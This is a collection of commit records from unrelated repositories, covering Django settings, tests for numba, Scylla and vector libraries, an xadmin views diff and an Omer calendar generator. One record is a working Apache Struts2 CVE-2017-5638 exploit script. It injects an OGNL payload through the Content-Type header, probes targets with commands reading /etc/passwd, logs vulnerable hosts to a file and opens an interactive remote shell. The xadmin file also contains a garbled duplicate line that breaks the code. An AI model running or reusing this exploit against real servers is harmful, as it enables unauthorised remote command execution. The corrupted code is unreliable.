a46f3dd56b716cf2c9c918e4135d2248388ba030 | Change template debugging back to False | webyneter/cookiecutter-django,ryankanno/cookiecutter-django,webyneter/cookiecutter-django,pydanny/cookiecutter-django,hackebrot/cookiecutter-django,thisjustin/cookiecutter-django,bopo/cookiecutter-django,trungdong/cookiecutter-django,ad-m/cookiecutter-django,topwebmaster/cookiecutter-django,trungdong/cookiecutter-django,schacki/cookiecutter-django,luzfcb/cookiecutter-django,hairychris/cookiecutter-django,schacki/cookiecutter-django,trungdong/cookiecutter-django,gappsexperts/cookiecutter-django,hackebrot/cookiecutter-django,gappsexperts/cookiecutter-django,schacki/cookiecutter-django,topwebmaster/cookiecutter-django,aleprovencio/cookiecutter-django,ryankanno/cookiecutter-django,schacki/cookiecutter-django,kappataumu/cookiecutter-django,bopo/cookiecutter-django,bopo/cookiecutter-django,webyneter/cookiecutter-django,asyncee/cookiecutter-django,webspired/cookiecutter-django,mistalaba/cookiecutter-django,ad-m/cookiecutter-django,luzfcb/cookiecutter-django,ryankanno/cookiecutter-django,ddiazpinto/cookiecutter-django,ddiazpinto/cookiecutter-django,thisjustin/cookiecutter-django,aleprovencio/cookiecutter-django,ad-m/cookiecutter-django,hackebrot/cookiecutter-django,mistalaba/cookiecutter-django,ddiazpinto/cookiecutter-django,mistalaba/cookiecutter-django,topwebmaster/cookiecutter-django,asyncee/cookiecutter-django,mistalaba/cookiecutter-django,topwebmaster/cookiecutter-django,webyneter/cookiecutter-django,Parbhat/cookiecutter-django-foundation,ryankanno/cookiecutter-django,hackebrot/cookiecutter-django,kappataumu/cookiecutter-django,gappsexperts/cookiecutter-django,hairychris/cookiecutter-django,ddiazpinto/cookiecutter-django,webspired/cookiecutter-django,gappsexperts/cookiecutter-django,hairychris/cookiecutter-django,pydanny/cookiecutter-django,asyncee/cookiecutter-django,luzfcb/cookiecutter-django,webspired/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,tru
ngdong/cookiecutter-django,Parbhat/cookiecutter-django-foundation,luzfcb/cookiecutter-django,hairychris/cookiecutter-django,thisjustin/cookiecutter-django,pydanny/cookiecutter-django,aleprovencio/cookiecutter-django,aleprovencio/cookiecutter-django,asyncee/cookiecutter-django,Parbhat/cookiecutter-django-foundation,kappataumu/cookiecutter-django,ad-m/cookiecutter-django,bopo/cookiecutter-django,webspired/cookiecutter-django,kappataumu/cookiecutter-django,Parbhat/cookiecutter-django-foundation | {{cookiecutter.project_slug}}/config/settings/test.py | {{cookiecutter.project_slug}}/config/settings/test.py | # -*- coding: utf-8 -*-
'''
Test settings
- Used to run tests fast on the continuous integration server and locally
'''
from .common import * # noqa

# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
# NOTE(review): django_coverage_plugin needs template debugging enabled to
# record template coverage (the previous revision set this to True for that
# reason) -- with False, template coverage will be silently missing; confirm
# this trade-off is intended.
TEMPLATES[0]['OPTIONS']['debug'] = False

# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')

# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025

# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'

# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': ''
    }
}

# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'

# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = (
    'django.contrib.auth.hashers.MD5PasswordHasher',
)

# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
    ('django.template.loaders.cached.Loader', [
        'django.template.loaders.filesystem.Loader',
        'django.template.loaders.app_directories.Loader',
    ]),
]
| # -*- coding: utf-8 -*-
'''
Test settings
- Used to run tests fast on the continuous integration server and locally
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
# Turn debug off so tests run faster
DEBUG = False
# But template debugging must be enabled for django_coverage_plugin
TEMPLATES[0]['OPTIONS']['debug'] = True
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
# In-memory email backend stores messages in django.core.mail.outbox
# for unit testing purposes
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# CACHING
# ------------------------------------------------------------------------------
# Speed advantages of in-memory caching without having to run Memcached
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# PASSWORD HASHING
# ------------------------------------------------------------------------------
# Use fast password hasher so tests run faster
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher',
)
# TEMPLATE LOADERS
# ------------------------------------------------------------------------------
# Keep templates in memory so tests run faster
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]),
]
| bsd-3-clause | Python |
e9b057d13e99dbcbbcf77467de49c6472f042b42 | Add files via upload | R4v3nBl4ck/Apache-Struts-2-CVE-2017-5638-Exploit- | Struts2_Shell001.py | Struts2_Shell001.py | #!/usr/bin/python
import urllib2
import os, sys, time
__Author__="Rvbk"
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'
YELLOW = '\033[33m'
ENDC = '\033[0m'
def cls():
os.system(['clear', 'cls'][os.name == 'nt'])
cls()
logo = BLUE+'''
*******************************************
* [!] Exploit Apache Struts2 {*}DEMO *
*******************************************
Code of Rvbk ''' +ENDC
print logo
print " * Usage: www.victima.com/files.login\n\n"
host = raw_input(BOLD+" [+] HOST con http(s)> "+ENDC)
print "\n"
if host.find("https://") == -1:
if host.find("http://") == -1:
host = "http://"+host
def validador():
arr_lin_win = ["file /etc/passwd","dir"]
return arr_lin_win
if len(host) > 0:
def exploit(comando):
exploit = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit
print BOLD+" [+] EXECUTION..."+ENDC
time.sleep(1)
for valida in validador():
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit(str(valida))})
result = urllib2.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1:
print RED+" [!] Vulnerable "+ENDC
owned = open('ListVulnStrutsFinal.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = raw_input(YELLOW+" [-] RUN EXPLOIT (y/n): "+ENDC)
if opcion == 'y':
cls()
while 1:
try:
separador = raw_input(GREEN+"\nroot@Shell:$ "+ENDC)
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit(str(separador))})
result = urllib2.urlopen(req).read()
print result
except:
sys.exit(0)
print BLUE+"\n BYE \n"+ENDC
else:
sys.exit(0)
print BLUE+"\n BYE \n"+ENDC
else:
time.sleep(1)
print GREEN+" [!] Not Vulnerable"+ENDC
print BLUE+"\n BYE \n"+ENDC
sys.exit(0)
else:
print " You must enter a URL.\n"
sys.exit(0)
| mit | Python | |
a45b62ab76324db2ae4a0842b901fec8e463e2f0 | Add tests for the constructor | ppb/ppb-vector,ppb/ppb-vector | tests/test_vector2_ctor.py | tests/test_vector2_ctor.py | import pytest # type: ignore
from hypothesis import given
from utils import floats, vectors, vector_likes
from ppb_vector import Vector2
# Subclass used to verify the constructor honours subclassing.
class V(Vector2): pass


@pytest.mark.parametrize('cls', [Vector2, V])
@given(x=vectors())
def test_ctor_vector_like(cls, x: Vector2):
    # Every vector-like form produced by vector_likes(x) must construct a
    # vector equal to x, and the result must be an instance of the class the
    # constructor was called on (Vector2 or the subclass V).
    for x_like in vector_likes(x):
        vector = cls(x_like)
        assert vector == x == x_like
        assert isinstance(vector, cls)


@pytest.mark.parametrize('cls', [Vector2, V])
@given(x=floats(), y=floats())
def test_ctor_coordinates(cls, x: float, y: float):
    # Two scalar arguments and a single 2-tuple must build the same vector.
    assert cls(x, y) == cls((x, y))
| artistic-2.0 | Python | |
221621e88496805fbee7849e376cce40e0d45f03 | Add test for #305 (thanks to @bfredl) | jriehl/numba,IntelLabs/numba,numba/numba,GaZ3ll3/numba,seibert/numba,jriehl/numba,pombredanne/numba,pitrou/numba,stuartarchibald/numba,gdementen/numba,ssarangi/numba,GaZ3ll3/numba,numba/numba,gdementen/numba,GaZ3ll3/numba,IntelLabs/numba,ssarangi/numba,stuartarchibald/numba,pitrou/numba,cpcloud/numba,pombredanne/numba,stefanseefeld/numba,gmarkall/numba,pombredanne/numba,sklam/numba,gmarkall/numba,seibert/numba,gdementen/numba,stefanseefeld/numba,pitrou/numba,gdementen/numba,stuartarchibald/numba,ssarangi/numba,sklam/numba,pombredanne/numba,gdementen/numba,sklam/numba,jriehl/numba,seibert/numba,gmarkall/numba,GaZ3ll3/numba,cpcloud/numba,sklam/numba,numba/numba,stonebig/numba,seibert/numba,cpcloud/numba,pitrou/numba,IntelLabs/numba,stuartarchibald/numba,gmarkall/numba,GaZ3ll3/numba,stuartarchibald/numba,sklam/numba,numba/numba,seibert/numba,pombredanne/numba,stefanseefeld/numba,stonebig/numba,cpcloud/numba,numba/numba,jriehl/numba,IntelLabs/numba,pitrou/numba,IntelLabs/numba,stonebig/numba,cpcloud/numba,stefanseefeld/numba,ssarangi/numba,gmarkall/numba,stonebig/numba,jriehl/numba,stefanseefeld/numba,ssarangi/numba,stonebig/numba | numba/tests/issues/test_issue_305.py | numba/tests/issues/test_issue_305.py | from __future__ import print_function, division, absolute_import
import tempfile
import textwrap
from numba import jit, autojit
# Thanks to @bfredl
def test_fetch_latest_source():
    """
    When reloading new versions of the same module into the same session (i.e.
    an interactive ipython session), numba sometimes gets the wrong version of
    the source from inspect.getsource()
    """
    # NOTE(review): Python 2 only — `exec open(fn)` is the Py2 exec *statement*
    # applied to a file object, and `f.write(str)` needs a text-mode tempfile.
    f = tempfile.NamedTemporaryFile()
    fn = f.name
    # fn = "/tmp/numbatest.py"
    f.write(textwrap.dedent("""
    @jit('i8()')
    def test():
        return 0
    """))
    f.flush()
    exec open(fn)
    # Append a second definition of test(); the file now contains both,
    # and re-exec'ing picks up the later one.
    f.write(textwrap.dedent("""
    @jit('i8()')
    def test():
        return 1
    """))
    f.flush()
    exec open(fn)
    # jit-compiled result must match the pure-Python function it wraps.
    assert test() == test.py_func() # gives 0 == 1
def test_no_auto_reload():
    """
    In this case autojit 'sees' the new version of the source even if it
    hasn't been reloaded. This could be fixed by fetching the ast directly
    at declaration time rather that at first compilation (2nd commit)
    """
    f = tempfile.NamedTemporaryFile()
    fn = f.name
    f.write(textwrap.dedent("""
    @autojit
    def test2():
        return 0
    """))
    f.flush()
    exec open(fn)
    f.write(textwrap.dedent("""
    @autojit
    def test2():
        return 1
    """))
    f.flush()
    # note that we don't reexec the file
    assert test2() == test2.py_func() # gives 1 == 0
# Run both repros directly when the module is exec'd/imported.
test_fetch_latest_source()
test_no_auto_reload()
618340e7dfd21c54ac713140079c53b205aae73e | Create tuples.py | JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking,JsWatt/Free-Parking | hacker_rank/python/basic_data_types/tuples.py | hacker_rank/python/basic_data_types/tuples.py | if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t = (tuple(integer_list))
print(hash(t))
| mit | Python | |
d3b99620a4794376f4319516af65aa0f5c433354 | Create really terrible demo | Zirientis/skulpt-canvas,Zirientis/skulpt-canvas | demo.py | demo.py | import document
# Runs under Skulpt in the browser: `document` is the Skulpt DOM module,
# so this script injects HTML into the page's output <pre> element.
pre = document.getElementById('edoutput')
pre.innerHTML = '''
<button onclick="var a=new XMLHttpRequest();a.open('GET','https://raw.githubusercontent.com/Zirientis/skulpt-canvas/master/core.js', false);a.send();console.log(a.response);">Run</button>
<span id="evaltext" style="display:none">
</span>
'''
# Put Python<->JS class here.
class FakeCanvas:
    # Stub matching the JS canvas API; intentionally a no-op placeholder.
    def fillRect(self, x, y, width, height):
        pass
| mit | Python | |
6af0081721acd4b6258b97c02424b2ccba80a303 | Create scale.py | cuongnb14/lab_clound_computing,huanpc/lab_cloud_computing | docs/learning-by-doing/week06-mesos-and-marathon/scale.py | docs/learning-by-doing/week06-mesos-and-marathon/scale.py | import http.client
import json

# Scale a Marathon app via its REST API (PUT /v2/apps/{appId}).
URI = 'localhost:8080'
header = {'Content-type': 'application/json'}
# BUG FIX: the old code json.dumps()'d the *string* '"instances": "3"',
# which sent a double-encoded JSON string instead of a JSON object.
# Marathon expects an object like {"instances": 3}.
json_data = json.dumps({'instances': 3})
method = 'PUT'
link = '/v2/apps/basic-0?force=true'
con = http.client.HTTPConnection(URI)
con.request(method, link, json_data, header)
response = con.getresponse()
print(response.read().decode())
con.close()  # release the socket explicitly
| apache-2.0 | Python | |
93a2c523383fd1903e2912c783efdd1d27dc81ee | add tests for inserting rows with missing key columns | scylladb/scylla,scylladb/scylla,scylladb/scylla,scylladb/scylla | test/cql-pytest/test_null.py | test/cql-pytest/test_null.py | # Copyright 2020 ScyllaDB
#
# This file is part of Scylla.
#
# Scylla is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Scylla is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Scylla. If not, see <http://www.gnu.org/licenses/>.
#############################################################################
# Tests for finer points of the meaning of "null" in various places
#############################################################################
import pytest
import re
from cassandra.protocol import SyntaxException, AlreadyExists, InvalidRequest, ConfigurationException, ReadFailure
from util import unique_name, random_string
@pytest.fixture(scope="session")
def table1(cql, test_keyspace):
    """Session-scoped fixture: create a throwaway table with a partition key
    `p` and clustering key `c`, yield its fully-qualified name, and drop it
    when the session ends."""
    table = test_keyspace + "." + unique_name()
    cql.execute(f"CREATE TABLE {table} (p text, c text, v text, primary key (p, c))")
    yield table
    cql.execute("DROP TABLE " + table)
# An item cannot be inserted without a key. Verify that before we get into
# the really interesting test below - trying to pass "null" as the value of
# the key.
# See also issue #3665.
def test_insert_missing_key(cql, table1):
    """INSERTs that omit the partition or clustering key must be rejected
    with an InvalidRequest mentioning the missing column."""
    s = random_string()
    # A clustering key is missing. Cassandra uses the message "Some clustering
    # keys are missing: c", and Scylla: "Missing mandatory PRIMARY KEY part c"
    with pytest.raises(InvalidRequest, match=re.compile('missing', re.IGNORECASE)):
        cql.execute(f"INSERT INTO {table1} (p) VALUES ('{s}')")
    # Similarly, a missing partition key
    with pytest.raises(InvalidRequest, match=re.compile('missing', re.IGNORECASE)):
        cql.execute(f"INSERT INTO {table1} (c) VALUES ('{s}')")
# A null key, like a missing one, is also not allowed.
# This reproduces issue #7852.
@pytest.mark.xfail(reason="issue #7852")
def test_insert_null_key(cql, table1):
    """An explicit null key value (literal `null` or a bound None) must be
    rejected like a missing key; currently fails — see issue #7852."""
    s = random_string()
    with pytest.raises(InvalidRequest, match='null value'):
        cql.execute(f"INSERT INTO {table1} (p,c) VALUES ('{s}', null)")
    with pytest.raises(InvalidRequest, match='null value'):
        cql.execute(f"INSERT INTO {table1} (p,c) VALUES (null, '{s}')")
    # Try the same thing with prepared statement, where a "None" stands for
    # a null. Note that this is completely different from UNSET_VALUE - only
    # with the latter should the insertion be ignored.
    stmt = cql.prepare(f"INSERT INTO {table1} (p,c) VALUES (?, ?)")
    with pytest.raises(InvalidRequest, match='null value'):
        cql.execute(stmt, [s, None])
    with pytest.raises(InvalidRequest, match='null value'):
        cql.execute(stmt, [None, s])
| agpl-3.0 | Python | |
2b095ad646f1e8d4280190c9a1c2ccbed512d43c | Create __init__.py | PyThaiNLP/pythainlp | pythainlp/romanization/__init__.py | pythainlp/romanization/__init__.py | from pythainlp.romanization.royin import *
| apache-2.0 | Python | |
2ce83fbdef3a139dfb5618e9dc7fde4f2c8249ec | add method params. | merlian/django-xadmin,f1aky/xadmin,huaishan/django-xadmin,ly0/xxadmin,merlian/django-xadmin,Keleir/django-xadmin,cgcgbcbc/django-xadmin,zhiqiangYang/django-xadmin,hochanh/django-xadmin,hochanh/django-xadmin,tvrcopgg/edm_xadmin,cgcgbcbc/django-xadmin,wbcyclist/django-xadmin,sshwsfc/django-xadmin,sshwsfc/xadmin,vincent-fei/django-xadmin,t0nyren/django-xadmin,sshwsfc/django-xadmin,jneight/django-xadmin,vincent-fei/django-xadmin,marguslaak/django-xadmin,Keleir/django-xadmin,sshwsfc/xadmin,alexsilva/django-xadmin,cgcgbcbc/django-xadmin,pobear/django-xadmin,Keleir/django-xadmin,zhiqiangYang/django-xadmin,taxido/django-xadmin,merlian/django-xadmin,tvrcopgg/edm_xadmin,zhiqiangYang/django-xadmin,alexsilva/django-xadmin,t0nyren/django-xadmin,jneight/django-xadmin,cupen/django-xadmin,AndyHelix/django-xadmin,marguslaak/django-xadmin,taxido/django-xadmin,hochanh/django-xadmin,sshwsfc/xadmin,Keleir/django-xadmin,AndyHelix/django-xadmin,pobear/django-xadmin,iedparis8/django-xadmin,zhiqiangYang/django-xadmin,pobear/django-xadmin,jeanmask/opps-admin,hochanh/django-xadmin,tvrcopgg/edm_xadmin,ly0/xxadmin,tvrcopgg/edm_xadmin,vincent-fei/django-xadmin,marguslaak/django-xadmin,cupen/django-xadmin,vincent-fei/django-xadmin,pobear/django-xadmin,cupen/django-xadmin,sshwsfc/django-xadmin,AndyHelix/django-xadmin,huaishan/django-xadmin,t0nyren/django-xadmin,marguslaak/django-xadmin,cupen/django-xadmin,f1aky/xadmin,iedparis8/django-xadmin,huaishan/django-xadmin,taxido/django-xadmin,t0nyren/django-xadmin,sshwsfc/django-xadmin,alexsilva/django-xadmin,wbcyclist/django-xadmin,huaishan/django-xadmin,iedparis8/django-xadmin,merlian/django-xadmin,wbcyclist/django-xadmin,jneight/django-xadmin,ly0/xxadmin,taxido/django-xadmin,AndyHelix/django-xadmin,f1aky/xadmin,ly0/xxadmin,f1aky/xadmin,sshwsfc/xadmin,alexsilva/django-xadmin | exadmin/views/website.py | exadmin/views/website.py | from django.utils.translation import ugettext as _
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.views.decorators.cache import never_cache
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from django.http import HttpResponse
from base import BaseAdminView
from dashboard import Dashboard
from exadmin.forms import AdminAuthenticationForm
from exadmin.models import UserSettings
class IndexView(Dashboard):
    """Admin landing page; reuses the Dashboard view with a fixed title."""
    title = "Main Dashboard"
class UserSettingView(BaseAdminView):
    """Persist a per-user key/value setting posted by the admin UI.

    NOTE(review): no auth decorator here — presumably BaseAdminView already
    enforces login; confirm, otherwise any POST can write settings.
    """
    @never_cache
    def post(self, request):
        key = request.POST['key']
        val = request.POST['value']
        # get_or_create, then overwrite the value — last write wins.
        us, created = UserSettings.objects.get_or_create(user=self.user, key=key)
        us.value = val
        us.save()
        return HttpResponse('')
class LoginView(BaseAdminView):
    """Render/process the admin login form via django.contrib.auth.views.login."""
    @never_cache
    def get(self, request, *args, **kwargs):
        context = self.get_context()
        context.update({
            'title': _('Log in'),
            'app_path': request.get_full_path(),
            # Redirect back to the originally requested page after login.
            REDIRECT_FIELD_NAME: request.get_full_path(),
        })
        defaults = {
            'extra_context': context,
            'current_app': self.admin_site.name,
            'authentication_form': AdminAuthenticationForm,
            'template_name': 'admin/login.html',
        }
        return login(request, **defaults)
    @never_cache
    def post(self, request, *args, **kwargs):
        # The auth view handles both GET and POST identically here.
        return self.get(request)
    ef post(self, request, *args, **kwargs):
        return self.get(request)
class LogoutView(BaseAdminView):
    """Log the user out via django.contrib.auth.views.logout."""
    # Optional template override; falls back to the auth app's default.
    logout_template = None
    @never_cache
    def get(self, request, *args, **kwargs):
        context = self.get_context()
        defaults = {
            'extra_context': context,
            'current_app': self.admin_site.name,
        }
        if self.logout_template is not None:
            defaults['template_name'] = self.logout_template
        return logout(request, **defaults)
    @never_cache
    def post(self, request, *args, **kwargs):
        return self.get(request)
| from django.utils.translation import ugettext as _
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.views.decorators.cache import never_cache
from django.contrib.auth.views import login
from django.contrib.auth.views import logout
from django.http import HttpResponse
from base import BaseAdminView
from dashboard import Dashboard
from exadmin.forms import AdminAuthenticationForm
from exadmin.models import UserSettings
class IndexView(Dashboard):
title = "Main Dashboard"
class UserSettingView(BaseAdminView):
@never_cache
def post(self, request):
key = request.POST['key']
val = request.POST['value']
us, created = UserSettings.objects.get_or_create(user=self.user, key=key)
us.value = val
us.save()
return HttpResponse('')
class LoginView(BaseAdminView):
@never_cache
def get(self, request):
context = self.get_context()
context.update({
'title': _('Log in'),
'app_path': request.get_full_path(),
REDIRECT_FIELD_NAME: request.get_full_path(),
})
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
'authentication_form': AdminAuthenticationForm,
'template_name': 'admin/login.html',
}
return login(request, **defaults)
@never_cache
def post(self, request):
return self.get(request)
class LogoutView(BaseAdminView):
logout_template = None
@never_cache
def get(self, request):
context = self.get_context()
defaults = {
'extra_context': context,
'current_app': self.admin_site.name,
}
if self.logout_template is not None:
defaults['template_name'] = self.logout_template
return logout(request, **defaults)
@never_cache
def post(self, request):
return self.get(request)
| bsd-3-clause | Python |
3419aa3dc2d14718c050e17f6ecc1a76844b5d26 | Add sfirah generator | cheshirex/shul-calendar,cheshirex/shul-calendar | sfirah.py | sfirah.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import hebcalendar
import sys
import codecs
import uuid
# Hebrew numerals for units (1-9) and tens (10-40); index 0 is empty so the
# value doubles as the list index.
numbers = ['', u'אחד', u'שנים', u'שלושה', u'ארבעה', u'חמשה', u'ששה', u'שבעה', u'שמונה', u'תשעה']
numbersTen = ['', u'עשר', u'עשרים', u'שלושים', u'ארבעים']

def getSfirahText(day):
    """Return the full Hebrew text for counting day `day` (1-49) of the Omer:
    the blessing, the day-count sentence (days, and weeks from day 7 on),
    and the concluding Harachaman line, joined with literal "\\n" sequences
    for ICS DESCRIPTION escaping.

    FIX: integer division now uses `//` — identical on Python 2 ints, and
    correct on Python 3, where `/` yields a float and breaks list indexing.
    """
    text = u"בָּרוּךְ אַתָּה ה' אֱלהֵינוּ מֶלֶךְ הָעולָם, אֲשֶׁר קִדְּשָׁנוּ בְּמִצְותָיו וְצִוָּנוּ עַל סְפִירַת הָעומֶר"
    text += u'\\n'
    # Days 1, 2 and 10 have irregular phrasing, so they are spelled out.
    if day == 1:
        text += u'היום יום אחד בעומר'
    elif day == 2:
        text += u'היום שני ימים בעומר'
    elif day == 10:
        text += u'היום עשרה ימים, שהם שבוע אחד ושלשה ימים בעומר'
    else:
        text += u'היום '
        text += numbers[day % 10]
        # Join units and tens with a vav for 21+ (e.g. "three and thirty").
        if day % 10 and day > 20:
            text += u' ו'
        if day > 10:
            if day < 20:
                text += u' '
            text += numbersTen[day // 10]
            text += u' יום'
        else:
            text += u' ימים'
        # From a full week onward, also state the week/day breakdown.
        if day >= 7:
            text += u', שהם '
            if day // 7 == 1:
                text += u'שבוע אחד'
            elif day // 7 == 2:
                text += u'שני שבועות'
            else:
                text += numbers[day // 7]
                text += u' שבועות'
            if day % 7 == 1:
                text += u' ויום אחד'
            elif day % 7 == 2:
                text += u' ושני ימים'
            elif day % 7:
                text += u' ו'
                text += numbers[day % 7]
                text += u' ימים'
        text += u' בעומר'
    text += u'\\n'
    text += u"הָרַחֲמָן, הוּא יַחֲזִיר לָנוּ עֲבודַת בֵּית הַמִּקְדָּשׁ לִמְקומָהּ בִּמְהֵרָה בְּיָמֵינוּ, אָמֵן סֶלָה"
    return text
# Namespace UUID: per-day event UIDs are derived deterministically from it,
# so regenerating the calendar keeps stable UIDs.
myUuid = uuid.UUID('{023e9cde-ab09-4611-a43f-dac7b1ce77b3}')
def usage():
    print 'sfirah.py Sfirah calendar Generation script'
    print 'Usage: sfirah.py <Jewish year>'
# Exactly one argument: the Jewish year to generate.
if len(sys.argv) != 2:
    usage()
    sys.exit(1)
year = int(sys.argv[1])
# Ask hebcalendar only for Omer days of that year (Israel scheme).
hebcalendar.setFilter(['omer'])
sfirah = hebcalendar.getYear(year, 'Israel')
out = codecs.open('sfirahFor%d.ics' % year, 'w', encoding='utf-8')
# Emit an iCalendar file: one all-day event with a 3.5h-before alarm per day.
out.write('BEGIN:VCALENDAR\r\n')
out.write('VERSION:2.0\r\n')
out.write('PRODID:sfirahCalendarGenerator_by_Daniel_Bernstein\r\n')
dayCounter = 1
for day in sorted(sfirah):
    date = sfirah[day]
    # date['gregorian'] is a (year, month, day) tuple -> YYYYMMDD.
    greg = '%04d%02d%02d' % date['gregorian']
    out.write('BEGIN:VEVENT\r\n')
    out.write('UID:%s\r\n' % uuid.uuid3(myUuid, '%d' % dayCounter).hex)
    timestamp = ':%sT000000' % greg
    out.write('DTSTART%s\r\n' % timestamp)
    out.write('DTEND%s\r\n' % timestamp)
    out.write(u'SUMMARY:ספירת העומר\r\n')
    text = getSfirahText(dayCounter)
    out.write('DESCRIPTION:%s\r\n' % text)
    out.write('BEGIN:VALARM\r\n')
    out.write('TRIGGER:-PT210M\r\n')
    out.write('ACTION:DISPLAY\r\n')
    out.write('DESCRIPTION:%s\r\n' % text)
    out.write('END:VALARM\r\n')
    out.write('END:VEVENT\r\n')
    dayCounter += 1
out.write('END:VCALENDAR\r\n')
out.close()
807a87ef5bfe1f34a072e3de0e1d60c07cefb5fb | Add test_pypy | naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode | unnaturalcode/test_pypy.py | unnaturalcode/test_pypy.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_pypy_syntax import checkPyPySyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """if(true)):
print ("I am correct")
"""
class TestStringMethods(unittest.TestCase):
    """Checks for checkPyPySyntax(): None for valid code, a list of
    CompileError objects describing the failure otherwise."""
    def test_syntax_ok(self):
        """Valid source yields no errors (None)."""
        toTest = checkPyPySyntax('a=1+2')
        self.assertTrue(toTest is None)
    def test_syntax_error(self):
        """An unmatched ')' yields one CompileError with the expected
        filename/line/text/errorname fields (bytes-encoded)."""
        toTest = checkPyPySyntax(ERROR_TEST)
        self.assertTrue(isinstance (toTest[0], CompileError))
        self.assertEqual(toTest[0].filename, 'toCheck.py'.encode())
        self.assertEqual(toTest[0].line, 1)
        self.assertEqual(toTest[0].column, None)
        self.assertEqual(toTest[0].functionname, None)
        self.assertEqual(toTest[0].text, 'unmatched \')\':if(true)):'.encode())
        self.assertEqual(toTest[0].errorname, 'SyntaxError'.encode())
if __name__ == '__main__':
unittest.main()
| agpl-3.0 | Python | |
4e0f9d8630847c92f02b0481fc0770cec68dadf7 | Implement auth tests | messente/verigator-python | messente/verigator/test/test_auth.py | messente/verigator/test/test_auth.py | from unittest import TestCase
from mock import MagicMock
from messente.verigator.client import RestClient
from messente.verigator.controllers import Auth
from verigator import routes
